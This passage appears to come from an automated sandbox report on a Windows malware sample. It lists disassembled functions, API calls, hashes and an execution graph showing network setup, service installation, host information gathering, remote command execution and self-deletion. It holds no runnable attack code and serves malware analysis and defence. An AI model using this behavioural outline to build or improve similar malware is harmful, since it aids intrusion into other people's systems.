                                • Opcode ID: 6b11f334dbbc8ef6b513b490cfc72df03ea8b8722a4b50408d6dca900db2c3ad
                                • Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
                                • Opcode Fuzzy Hash: 6b11f334dbbc8ef6b513b490cfc72df03ea8b8722a4b50408d6dca900db2c3ad
                                • Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669
                                Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                  • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                • String ID:
                                • API String ID: 1404258612-0
                                • Opcode ID: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                • Instruction ID: 4f4abe4324f754641e01f0e672b51484e064b7e428c6eed24e296c4d37409401
                                • Opcode Fuzzy Hash: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                • Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28
                                Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(?), ref: 00401D22
                                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                • CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirect
                                • String ID:
                                • API String ID: 3272661963-0
                                • Opcode ID: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                • Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
                                • Opcode Fuzzy Hash: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                • Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F
                                Function 00402BBE Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
                                • GetTickCount.KERNEL32 ref: 00402BEF
                                • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
                                • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                • Instruction ID: f2d052a30a3472248e345e5832336eca953f0b1533712f6c56216133e551431f
                                • Opcode Fuzzy Hash: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                • Instruction Fuzzy Hash: 2AF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D77868818BAD
                                Function 004037EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowTextA.USER32(00000000,00423680), ref: 00403887
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: TextWindow
                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 530164218-3283962145
                                • Opcode ID: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                • Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
                                • Opcode Fuzzy Hash: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                • Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98
                                Function 00404CCB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00404D01
                                • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404D6F
                                  • Part of subcall function 00403DDB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403DED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                • Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
                                • Opcode Fuzzy Hash: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                • Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9
                                Function 004024BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                • WriteFile.KERNEL32(00000000,?,open C:\Windows\temp\Edit9,00000000,?,?,00000000,00000011), ref: 004024FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: FileWritelstrlen
                                • String ID: open C:\Windows\temp\Edit9
                                • API String ID: 427699356-1012079565
                                • Opcode ID: 88d3828efba7f0f9621c900284220c7fbe7b1f25f81f4ab1699cd667c1234228
                                • Instruction ID: 28baf68bc3b2ef7cd727d17ca875bc327529d04ff6cae4c8aacaeccaaba980a4
                                • Opcode Fuzzy Hash: 88d3828efba7f0f9621c900284220c7fbe7b1f25f81f4ab1699cd667c1234228
                                • Instruction Fuzzy Hash: 5AF0B4B2A04241FBDB40BBA09E49AAE37689B00348F10443BA206F51C2D6BC4982A76D
                                Function 00403491 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
                                • GlobalFree.KERNEL32(?), ref: 004034B2
                                Strings
                                • "C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 004034A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Free$GlobalLibrary
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"
                                • API String ID: 1100898210-3663855964
                                • Opcode ID: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                • Instruction ID: 7bfc0464e02b508f879d35a29cae48101a6ab00b4f5f00e512934bdeb57274a8
                                • Opcode Fuzzy Hash: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                • Instruction Fuzzy Hash: FBE08C3280653097C7221F05AE04B9AB66C6F94B22F068076E8407B3A1C3782C428AD8
                                Function 00405517 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 0040551D
                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 0040552B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\Desktop
                                • API String ID: 2709904686-2743851969
                                • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                • Instruction ID: 1341b21386aa9ee456471dc2eb10899dbff8c866770b3e7d35d8712ddbbc4649
                                • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                • Instruction Fuzzy Hash: D9D0C7B2509DB06EE7035614DC04B9F7B89DF17710F1944A2E540A61D5D27C5D418BFD
                                Function 00405629 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405649
                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: lstrlen$CharNextlstrcmpi
                                • String ID:
                                • API String ID: 190613189-0
                                • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                • Instruction ID: 25fbcb832c33ec4964fd827efed06e6d871dcd69bbe6b28132c6debe6a032c6a
                                • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                • Instruction Fuzzy Hash: 02F0A736249D51DBC2025B355C04E6FAA94EF92354B54097AF444F2251D33A98129BBF

                                Execution Graph

                                Execution Coverage:7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:14.8%
                                Total number of Nodes:610
                                Total number of Limit Nodes:2
                                execution_graph 1420 405182 WSAStartup 1421 4051a6 Sleep 1420->1421 1425 40507d time localtime wsprintfA 1421->1425 1423 4051b4 atoi 1423->1421 1424 4051cc Sleep CreateThread 1423->1424 1426 4050ca WSAStartup 1424->1426 1425->1423 1427 4050e3 CreateThread WaitForSingleObject CloseHandle closesocket Sleep 1426->1427 1427->1427 1436 405244 LoadLibraryA 6CFC6DE0 FindResourceA 1437 405284 LoadResource 1436->1437 1438 40532c 1436->1438 1437->1438 1440 40529f 1437->1440 1440->1438 1441 4052a8 LockResource 1440->1441 1441->1438 1442 4052b5 wsprintfA 1441->1442 1443 4052e6 1442->1443 1443->1438 1444 4052ed WriteFile SetFilePointer lstrlen WriteFile CloseHandle 1443->1444 1444->1438 1445 4027e4 1447 4027ed 1445->1447 1446 402967 realloc 1448 40281c 1446->1448 1447->1446 1447->1448 1355 406a48 __set_app_type __p__fmode __p__commode 1356 406ab7 1355->1356 1357 406acb 1356->1357 1358 406abf __setusermatherr 1356->1358 1367 406bb2 _controlfp 1357->1367 1358->1357 1360 406ad0 _initterm __getmainargs _initterm 1361 406b24 GetStartupInfoA 1360->1361 1363 406b58 GetModuleHandleA 1361->1363 1368 40597d WSAStartup 1363->1368 1367->1360 1379 4059f4 LoadLibraryA 6CFC6DE0 _mbscpy _mbscat RegOpenKeyExA 1368->1379 1371 4059a1 StartServiceCtrlDispatcherA 1373 4059c1 exit _XcptFilter 1371->1373 1372 4059c7 1381 405b10 28 API calls 1372->1381 1376 4059e7 1407 40355b LoadLibraryA 6CFC6DE0 GetModuleFileNameA GetShortPathNameA GetEnvironmentVariableA 1376->1407 1380 40599d 1379->1380 1380->1371 1380->1372 1382 405c64 1381->1382 1383 405d26 1381->1383 1418 406bd0 LoadLibraryA 6CFC6DE0 1382->1418 1384 405d29 OpenSCManagerA 1383->1384 1386 406033 1384->1386 1387 405d5b ChangeServiceConfig2A 1384->1387 1412 40604d 1386->1412 1398 405e2a 1387->1398 1388 405c6b 1389 406bd0 2 API calls 1388->1389 1391 405c79 1389->1391 1393 406bd0 2 API calls 1391->1393 1395 405c84 1393->1395 1396 406bd0 2 API calls 1395->1396 1397 405c8f 1396->1397 1399 406bd0 2 API calls 1397->1399 1401 405e3e GetLastError 1398->1401 1404 405e4b 1398->1404 1400 405c9a 1399->1400 1402 406bd0 2 API calls 1400->1402 1401->1404 1403 405ca5 wsprintfA _mbscat _mbscat 1402->1403 1405 405cf7 memset _mbscpy 1403->1405 1404->1386 1406 405e8c _mbscpy _mbscat RegOpenKeyA lstrlen 1404->1406 1405->1384 1406->1386 1408 403610 ShellExecuteEx 1407->1408 1410 4036bf ExitProcess 1408->1410 1411 40367f 6 API calls 1408->1411 1411->1410 1413 406055 1412->1413 1414 406089 1413->1414 1415 40607d RegCloseKey 1413->1415 1416 40355b 12 API calls 1414->1416 1415->1414 1417 4059db 1416->1417 1417->1373 1417->1376 1419 406bea 1418->1419 1419->1388 1449 4027a8 1450 4027b0 strlen malloc 1449->1450 1452 4027ed 1450->1452 1451 402967 realloc 1453 40281c 1451->1453 1452->1451 1452->1453 1454 4067e9 1458 406719 1454->1458 1455 40692b ??3@YAXPAX 1455->1458 1456 40680c 1457 406926 1456->1457 1462 4068f1 sprintf _mbscpy 1456->1462 1463 4068b1 sprintf _mbscpy 1456->1463 1458->1455 1458->1456 1459 406953 free 1458->1459 1460 406723 strcmp 1458->1460 1464 406974 1459->1464 1465 406969 GetTickCount 1459->1465 1460->1458 1461 406741 GetIfTable 1460->1461 1461->1458 1466 406787 ??2@YAPAXI 1461->1466 1462->1457 1463->1457 1465->1464 1466->1458 1467 4067b5 GetIfTable 1466->1467 1467->1455 1467->1458 1468 4048aa 9 API calls 1514 40484f htons 1468->1514 1471 404e6b 1475 404974 1565 4034e5 wsprintfA LoadLibraryA 1475->1565 1478 40497c memcpy send 1478->1471 1481 4049f0 1478->1481 1479 404a6b memset 1566 4037ea 1479->1566 1481->1471 1481->1479 1482 4037ea 3 API calls 1481->1482 1483 404e82 OpenMutexA 1481->1483 1484 404bf6 lstrcpyn 1481->1484 1485 404cc5 OpenMutexA 1481->1485 1489 404df2 GetTickCount wsprintfA 1481->1489 1491 404b75 lstrcpyn lstrlen lstrcpyn 1481->1491 1492 404c5b GetDesktopWindow ShellExecuteA 1481->1492 1496 404b07 lstrcpyn lstrlen lstrcpyn 1481->1496 1502 406bd0 LoadLibraryA 6CFC6DE0 1481->1502 1505 406bd0 2 API calls 1481->1505 1508 404f89 1481->1508 1482->1481 1486 404ea3 1483->1486 1487 404e95 ReleaseMutex CloseHandle 1483->1487 1584 403135 1484->1584 1485->1481 1493 404cd8 ReleaseMutex CloseHandle 1485->1493 1590 40351a OpenSCManagerA 1486->1590 1487->1486 1497 404e1f LoadLibraryA 6CFC6DE0 1489->1497 1578 403280 1491->1578 1492->1479 1493->1481 1572 403311 1496->1572 1501 404e48 WinExec 1497->1501 1499 404f7d 1500 40355b 12 API calls 1499->1500 1503 404f82 ExitProcess 1500->1503 1501->1479 1502->1481 1506 404d57 wsprintfA 1505->1506 1507 404d81 LoadLibraryA 6CFC6DE0 1506->1507 1507->1481 1509 40351a 5 API calls 1508->1509 1510 404f8f memset sprintf SHDeleteKeyA 1509->1510 1511 405063 1510->1511 1512 40355b 12 API calls 1511->1512 1513 405068 WinExec ExitProcess 1512->1513 1595 406c10 LoadLibraryA 6CFC6DE0 inet_addr 1514->1595 1517 4048a5 1517->1471 1519 403492 setsockopt 1517->1519 1518 404899 closesocket 1518->1517 1520 4034b2 WSAIoctl 1519->1520 1521 4034e3 memset 1519->1521 1520->1521 1522 406090 6 API calls 1521->1522 1523 406111 1522->1523 1524 40625c 1523->1524 1525 40623c _mbscpy 1523->1525 1526 40628b 1524->1526 1527 40626e _mbscpy 1524->1527 1525->1524 1528 4062bd 1526->1528 1529 40629d _mbscpy 1526->1529 1527->1526 1530 4062ef 1528->1530 1531 4062cf _mbscpy 1528->1531 1529->1528 1532 40634d 1530->1532 1534 40632d _mbscpy 1530->1534 1535 40630e _mbscpy 1530->1535 1531->1530 1533 4063ac 1532->1533 1537 40638c _mbscpy 1532->1537 1538 40636d _mbscpy 1532->1538 1536 40640e 1533->1536 1540 4063cc _mbscpy 1533->1540 1541 4063ee _mbscpy 1533->1541 1534->1532 1535->1532 1539 406440 sprintf _mbscpy lstrcpy 1536->1539 1542 406420 _mbscpy 1536->1542 1537->1533 1538->1533 1543 406506 1539->1543 1540->1536 1541->1536 1542->1539 1544 4065d6 _mbscpy 1543->1544 1545 40650e RegQueryValueExA 1543->1545 1546 406655 GlobalMemoryStatusEx 1544->1546 1547 406558 GetSystemInfo memset sprintf _mbscpy 1545->1547 1548 406686 __aulldiv 1546->1548 1547->1546 1549 406694 wsprintfA malloc GetAdaptersInfo 1548->1549 1550 406704 GetAdaptersInfo 1549->1550 1551 4066e7 free malloc 1549->1551 1552 406953 free 1550->1552 1553 406719 1550->1553 1551->1550 1554 406974 1552->1554 1555 406969 GetTickCount 1552->1555 1553->1552 1556 406723 strcmp 1553->1556 1560 40692b ??3@YAXPAX 1553->1560 1562 40680c 1553->1562 1554->1475 1555->1554 1556->1553 1557 406741 GetIfTable 1556->1557 1557->1553 1558 406787 ??2@YAPAXI 1557->1558 1558->1553 1559 4067b5 GetIfTable 1558->1559 1559->1553 1559->1560 1560->1553 1561 406926 1561->1475 1562->1561 1563 4068f1 sprintf _mbscpy 1562->1563 1564 4068b1 sprintf _mbscpy 1562->1564 1563->1561 1564->1561 1565->1478 1567 403803 select 1566->1567 1568 4037fe 1566->1568 1567->1568 1571 403835 1567->1571 1568->1481 1569 403839 __WSAFDIsSet 1569->1567 1570 40384c recv 1569->1570 1570->1568 1570->1571 1571->1567 1571->1568 1571->1569 1573 403369 1572->1573 1576 403327 1572->1576 1573->1481 1574 403358 1598 4030fd CreateThread 1574->1598 1576->1574 1597 4030fd CreateThread 1576->1597 1579 403299 1578->1579 1580 40330d 1578->1580 1581 4032fc 1579->1581 1583 4030fd CreateThread 1579->1583 1580->1481 1599 4030fd CreateThread 1581->1599 1583->1579 1585 40327c 